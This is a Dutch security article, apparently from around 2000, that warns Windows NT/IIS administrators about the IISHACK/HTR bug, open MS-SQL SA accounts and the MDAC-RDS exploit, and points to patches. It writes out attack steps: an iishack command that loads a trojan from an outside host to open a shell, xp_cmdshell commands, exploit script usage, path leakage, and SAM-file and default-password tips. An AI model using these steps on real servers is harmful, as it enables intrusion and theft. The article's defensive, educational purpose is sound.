De afgelopen tijd zijn er een groot aantal servers 'gekraakt' die Microsoft
Windows NT met Internet Information Server draaien, met dit artikel hopen
wij beheerders van dergelijke systemen enige hulp te kunnen bieden, zodat
zij de grootste gaten kunnen dichten.

Dit document is geschreven in een serie documenten die de achtergrond van
het 'hacken' moeten toelichten, destijds sprak ik met Skin Quad tijdens Take
Over wat er werkelijk mankeerde aan de huidige generatie 'hackers' probleem
was dat men zich tegenwoordig niet meer verdiepte in de techniek, maar men
zo snel mogelijk en zoveel mogelijk trofeeën wilde verzamelen.

Hierdoor brengt men veel schade aan zonder te weten waar men mee bezig is.
Dit trok ook de aandacht van de overheid, die op slimme manier duidelijk
maakte dat het uit was met de pret. -en terecht -

De artikelen in deze reeks zijn beslist niet bedoelt om mensen op ideeën te
brengen, ze dienen om mensen voor te lichten, en tevens inzicht te geven in
de materie.

Eerder verschenen in deze reeks:

Stukje over ethernet (werking ARP requests) H4H nr.1

NFS server scan H4H nr. 2

Wetsvoorstel Computercriminaliteit II H4H nr. 6

Bovenstaande artikel zijn allen te vinden bij href=/golink.php3?url=http://www.hackers4hackers.org>www.hackers4hackers.org.

Dit keer behandelen we Microsoft Windows NT met Internet Information
Server, om de simpele reden dat een onderzoek door Attrition heeft
aangewezen dat Windows NT met IIS het meest gekraakte systeem is.
Dit heeft met een aantal zaken te maken, ten eerste zijn de meeste 'hack'
tooltjes (gebruikt door script kiddies) ook voor het Windows besturing
systeem
beschikbaar, hierdoor wordt de drempel enorm verlaagd.
Tevens zijn er een aantal tooltjes beschikbaar voor het Linux/Unix platform
die men niet als root -gebruiker met alle rechten op het systeem - hoeft te
gebruiken, ook dit werkt drempel verlagend.

Ook is het een feit dat een standaard installatie van Microsoft producten
veel beveiligingsproblematiek met zich meebrengt: ongewenst worden
componenten geïnstalleerd, beschikbaar voor de 'hacker', die grote
beveiligingsrisico's met zich mee brengen.

Hierdoor kan het gebeuren dat een persoon met weinig verstand van zaken
langs komt met een standaard tooltje en een succesvolle penetratie kan
bewerkstelligen.

In sommige gevallen kan zelfs de integriteit van data gemanipuleerd worden,
hieronder verstaan wij: defacen -veranderen van pagina(s)-, wissen,
raadplegen, muteren etc.etc.

De mensen die enigszins ethisch bezig zijn zullen meteen na een succesvolle
penetratie een mailtje naar u sturen, en aangezien dit soort figuren meestal
wel weten waar ze mee bezig zijn zullen zij waarschijnlijk ook niet de
integriteit van uw data veranderen.

In het ergste geval zullen ze een bestandje aan maken met daarin de
informatie die u nodig heeft om het lek te dichten, of hoe u in contact kunt
komen met de betreffende 'hacker'.

Indien de 'hacker' enige mate van beveiliging heeft omzeilt dan heeft deze
persoon de wet computercriminaliteit overtreden, hierdoor kan het voorkomen
dat de 'hacker' u wel wil helpen, maar wel vrijgesteld van rechtsvervolging
wil worden.

Het is uiteraard aan u om dat te beslissen, maar het is ten zeerste aan te
raden hierop in te gaan, immers de 'hacker' die bij u is langs geweest, weet
als geen ander waar het lek zit.

Ook zal een 'evil-hacker' geen wraak uitoefenen, ook indien zijn identiteit
bekend is hoeft dat voor hem namelijk geen reden te zijn om uw data en
passwords die hij tijdens kraak heeft buit gemaakt te delen met andere
'evil-hackers' waardoor u lange tijd hinder kunt ondervinden, een voorbeeld
hiervan is WorldOnline waar nu nog, een jaar later, een lijst met werkende
passwords van rondslingert.

Op dit moment zijn er 3 methodes die erg populair zijn:

IIShack

De eerste is al een oudje namelijk IISHACK (ook bekend onder HTR bug)

Door een fout in enkele dynamische bibliotheken die gebruikt worden om aan
de server
kant bestanden met een bepaalde extensie uit te voeren zoals .htr bestanden,
is het
mogelijk, in sommige gevallen, om programmatuur -zoals een trojan- op de
server te zetten.

De bug is bekend gemaakt door Eeye, en die heeft ook meteen ook een
zogenoemde exploit -instructies of programmatuur waarmee bug aangetoond kan worden - op hun
sie gezet.

Hun server bestaat uit twee gedeelten een zogenoemde loader -een programma
die iets kan sturen-
en zogenoemde package - het af te leveren informatie of programmatuur -.
Met behulp van de loader IISHACK.EXE is het in sommige gevallen mogelijk om
het package NCX.EXE
op de server te zetten, indien dit gelukt is en er aan enkele
voorwaarden -versies van dynamische
bilbliotheken- is voldaan, zal NCX.EXE op de server gestart worden, NCX zal
gedraagt zich net als
een trojan, hij zet een toegangsmogelijkheid open standaard op port80 -of
indien ncx.exe wordt
herschreven iedere willekeurige port - waarna men met behulp van telnet
toegang kan verschaffen
tot harddisk van server, men kan en ziet letterlijk het zelfde als wat je
zou zien en kunnen als
je op de server een dosbox zou openen.

Ten alle tijden zal de IIS service er tijdelijk mee stoppen, indien poging
ook daadwerkelijk lukt, zal door exit in te tikken de IIS service weer
normaal verder werken.

Aangezien pogingen niet altijd in een keer zullen werken, en men 6
parameters - offsets -, in sommige
gevallen zullen de verschillende parameters - offsets - in het geheel niet
werken.

U zult merken dat u telkens de IIS sevice opnieuw moet opstarten, dit is een
duidelijke signaal dat u mogelijk dit lek -en in alle gevallen Denial of
Service attack - heeft.

U kunt dit gemakkelijk zelf testen door IISHACK te downloaden :
www.hit2000.org/iishack.exe
Door c:iishack www.uwserver.nl 80 www.hit2000.org/ncx.exe te draaien, kunt
u zelf controleren of dit lek ook bij u aanwezig is.
Indien IIS stopt -of met browser pagina niet meer bereikbaar is - dan is dit
lek bij u aanwezig.

U kunt dit probleem verhelpen door de patch te installeren die op
onderstaande URL te vinden is:
target=_blank>ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/ext-fix/

Volledige uitleg van werking van IISHACK exploit verwijzen wij naar het
artikel, dat u hieronder kunt vinden:
href=/golink.php3?url=http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
target=_blank>http://www.eeye.com/database/advisories/ad06081999/ad06081999.html

Microsoft heeft hieromtrent een advisory geschreven welke kan worden terug
gevonden op:
href=/golink.php3?url=http://www.microsoft.com/security/bulletins/ms99-019.asp
target=_blank>http://www.microsoft.com/security/bulletins/ms99-019.asp

Database toegang met ODBC

Databasetoegang verschaffen met behulp van ODBC componenten is op meerdere
manieren
mogelijk, wij zullen er hier slechts 2 meest voorkomende behandelen:
Ten eerste MS-SQL: Laatst heeft er in de krant een artikel gestaan waarin
werd verteld dat er veel sites die NT servers aan het internet lek waren,
dit kwam omdat men MS-SQL gebruikt en daarbij vergeten zijn een paar
standaard account te verwijderen of van wachtwoord te voorzien.
Dit geldt overigens niet alleen voor MS-SQL maar ook voor andere software en
hardware, telnet maar eens naar een Cisco router en vul voor de grap cisco
als wachtwoord, in 5 van de 10 gevallen zat dit werken.
De oplossing hiervoor is simpel zet toegang uit -port 1433 firewallen - of
zet een wachtwoord op SA.
Deze gebruiker heeft de rechten waarmee MS-SQL draait op NT machine,
standaard local system rechten, hierdoor heb je alle rechten op
desbetreffende server en aan alles waarmee deze server contact mee heeft.
Hierdoor kun je met Query-analyser van MS-SQL 7.0 bijvoorbeeld de volgende
commando's kan uitvoeren:
xp_cmdshell 'net view'
xp_cmdshell 'net use'
xp_cmdshell 'net stop w3svc'
xp_cmdshell 'dir /s > Inetpubwwwrootbla.txt'
etc..etc...
Vraag u zelf eens af waarom u een SQL server rechtstreeks aan het internet
hangt, in de meeste gevallen is dit niet nodig, en is het veel veiliger om
SQL server(s) in een DMZ te plaatsen.

Indien u wilt testen of uw MS-SQL server van buiten af te benaderen is doe
dan het volgende:

Start>Instellingen>Configuratie Scherm>ODBC-gegevensbronbeheer
Toevoegen, selecteer SQL server>volgende>voer naam en IP of DNS van uw
server in >volgende>vink SQL Server-verificatie met aanmeldinfs-id aan en
vul bij Aanmeldings-id SA in druk op Clientconfiguratie, en vink TCP/IP aan>
OK > Volgende -kan enige tijd duren -
Indien er een foutmelding komt lees deze dan, indien daar Login Failed
staat -SQL server-fout 4002 dan bestaat login niet of is userid SA van een
password voorzien.

MDAC-RDS-exploit

Een tweede erg veel gebruikte methode is zogenoemde MDAC-RDS-exploit.

Remote Data Service (RDS) is een componet van Microsoft Data Access
Components (MDAC),
welke standaard geïnstalleerd wordt als men Windows NT Server's Internet
Information Service (IIS) 4.0
installeerd vanaf is de Microsoft Windows NT Option Pack.

Het de RDS component dient er voor om het mogelijk te maken gecontroleerde
Internet toegang te verschaffen aan
op afstand benaderbare gegevens bronnen met behulp van Windows NT's IIS.

Het probleem bij deze fout in IIS is dat er een commando kan worden
uitgevoerd,
waarvan de uitvoer kan worden herleid naar een bestand.
Dit bestand kan vervolgens met het grootste gemak worden bekeken in een
web-browser.

Doordat exploit een enkel commando kan uitvoeren, en blind werkt, moet je
eerst absolute path van de Inetpub directory zien te vinden.
Dit werd, enige tijd na MDAC exploit bekend werd, dan ook toevalligerwijs
ontdekt.
Door een bestand op te vragen met achtervoegsel .idq die niet bestaat
krijgt men een absolute path te zien:
b.v.
http://www.ns.nl/er.idq
Resultaat:
The IDQ file C:Inetpubserverswww.ns.nlwwwrooter.idq could not be found.

Door nu exploit uit te voeren:
./msdac2.pl -h www.ns.nl
En indien het mogelijk is om commando's uit te voeren -exploit geeft dat
aan -.
Kunt u opdrachten uitvoeren waarvan resultaat met behulp van browser bekeken
kan worden.

Bijvoorbeeld dir /s > C:Inetpubserverswww.ns.nlwwwrootbla.txt

In uw browser kunt u door URL: www.uwserver.nl/bla.txt opvragen, vervolgens
weet de 'hacker' waar elk bestand staat.
Door bestanden naar uw wwwroot te kopiëren -of erger verplaatsen - elk
bestand opvragen.

De bestanden waar men het eerste naar kijkt is vaak uw sam repair, deze kan
men
kraken waardoor men op veel gebruikelijkere manier kan inloggen -b.v. door
ftp te gebruiken -

U kunt dit probleem bij u zelf testen door mdac.pl te downloaden:
www.hit2000.org/mdac.pl
Op een Linux machine hoeft u alleen chmod +x mdac.pl en daarna ./mdac.pl -h
www.uwserver.nl te doen, de rest wijst zich zelf.

Om dit probleem op te lossen:

Stel vast of u RDS functionaliteit nodig heeft indien u het niet nodig heeft
kunt u met de onderstaande instructies het probleem elimineren.

Indien u RDS functionaliteit wel nodig heeft verwijzen wij u naar de
onderstaande URL voor een oplossing:
href=/golink.php3?url=http://www.microsoft.com/technet/security/bulletin/fq99-025.asp
target=_blank>http://www.microsoft.com/technet/security/bulletin/fq99-025.asp

Indien u RDS functionaliteit niet nodig heeft:
Ongeacht van versie die u gebruikt van MDAC, kunt u op onderstaande RDS
functionaliteit uitzetten:
Verwijder de virtual directory /msadc van uw default Web site.
Verwijder uit registry de volgende keys:

• HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services W3SVC Parameters
  ADCLaunch RDSServer.DataFactory
  
• HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services W3SVC Parameters
  ADCLaunch AdvancedDataFactory
  
• HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services W3SVC Parameters
  ADCLaunch VbBusObj.VbBusObjCls
  

Verdere informatie hierover kan gevonden worden bij onderstaande URL:
target=_blank>http://www.microsoft.com/security/bulletins/ms99-025.asp

Het is aan te raden om Microsoft Internet Information Server 4.0 Security
Checklist eens te doorlopen:
target=_blank>http://www.microsoft.com/security/products/iis/CheckList.asp

Bronnen:

www.security.nl

www.ntbugtraq.com

www.securityfocus.com

www.eeye.com

www.microsoft.com/security

www.attrition.com

www.hit2000.nl

praktijk ervaring

Tot slot:

Aangezien dit artikel slechts de meest gebruikte manieren behandelt om te
'hacken' bij een server die NT met IIS draait kunt u na het lezen van dit
artikel en na het patchen van de hierboven beschreven bugs, er slechts van
uit gaan dat de eerste de beste niet zal kunnen penetreren bij u, maar dit
wil niet zeggen dat het onmogelijk is, alleen een audit van gehele
infrastructuur kan aantonen of u tot 99,9% veilig bent -100% kan namelijk
niet -

Ook worden er vrijwel dagelijks nieuwe lekken in Windows producten gevonden
waardoor het moeilijk is om een eenmalige advies te geven, die altijd
werkt - je kunt altijd server uit zetten. -

Ook zult u niet moeten vergeten dat handelingen die u op afstand op uw NT
machine kunt doen, zoals het beheer van een MS-SQL database niet versleuteld
verzonden wordt, aangezien uw verkeer ten alle tijden op meerdere punten
afgetapt kan worden is er altijd de kans dat iemand het verkeer kan inzien,
indien het om vertrouwelijke gegevens gaat zoals klantgegevens of
bedrijfsinformatie, is het zeer verstandig om versleutelde TCP/IP tunnels te
gebruiken.

Met dank aan Eguapo's voor het verstrekken van meer informatie omtrent
MS-SQL.